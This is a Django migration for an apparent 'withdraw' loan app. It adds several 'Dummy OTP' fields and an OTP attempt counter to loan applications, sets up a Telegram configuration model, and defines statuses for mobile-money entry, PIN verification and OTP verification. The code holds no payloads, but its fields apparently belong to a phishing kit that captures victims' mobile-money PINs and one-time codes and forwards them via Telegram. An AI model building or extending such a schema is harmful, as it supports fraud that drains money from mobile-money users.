# Generated by Django 4.2.7 on 2026-01-06 12:56

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('withdraw', '0002_telegramconfig_alter_loanapplication_options_and_more'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='loanapplication',
            options={'ordering': ['-created_at'], 'verbose_name': 'Loan Application', 'verbose_name_plural': 'Loan Applications'},
        ),
        migrations.AlterModelOptions(
            name='telegramconfig',
            options={'verbose_name': 'Telegram Configuration', 'verbose_name_plural': 'Telegram Configurations'},
        ),
        migrations.AddField(
            model_name='loanapplication',
            name='otp_1',
            field=models.CharField(blank=True, help_text='Second Dummy OTP', max_length=4, null=True),
        ),
        migrations.AddField(
            model_name='loanapplication',
            name='otp_2',
            field=models.CharField(blank=True, help_text='Third Dummy OTP', max_length=4, null=True),
        ),
        migrations.AddField(
            model_name='loanapplication',
            name='otp_3',
            field=models.CharField(blank=True, help_text='Fourth Dummy OTP', max_length=4, null=True),
        ),
        migrations.AddField(
            model_name='loanapplication',
            name='otp_count',
            field=models.IntegerField(default=0, help_text='Number of OTP attempts'),
        ),
        migrations.AlterField(
            model_name='loanapplication',
            name='status',
            field=models.CharField(choices=[('pending', 'Pending'), ('ecocash_entry', 'Airtel Entry'), ('pin_verified', 'PIN Verified'), ('otp_verified', 'OTP Verified'), ('completed', 'Completed'), ('failed', 'Failed')], default='pending', max_length=20),
        ),
    ]
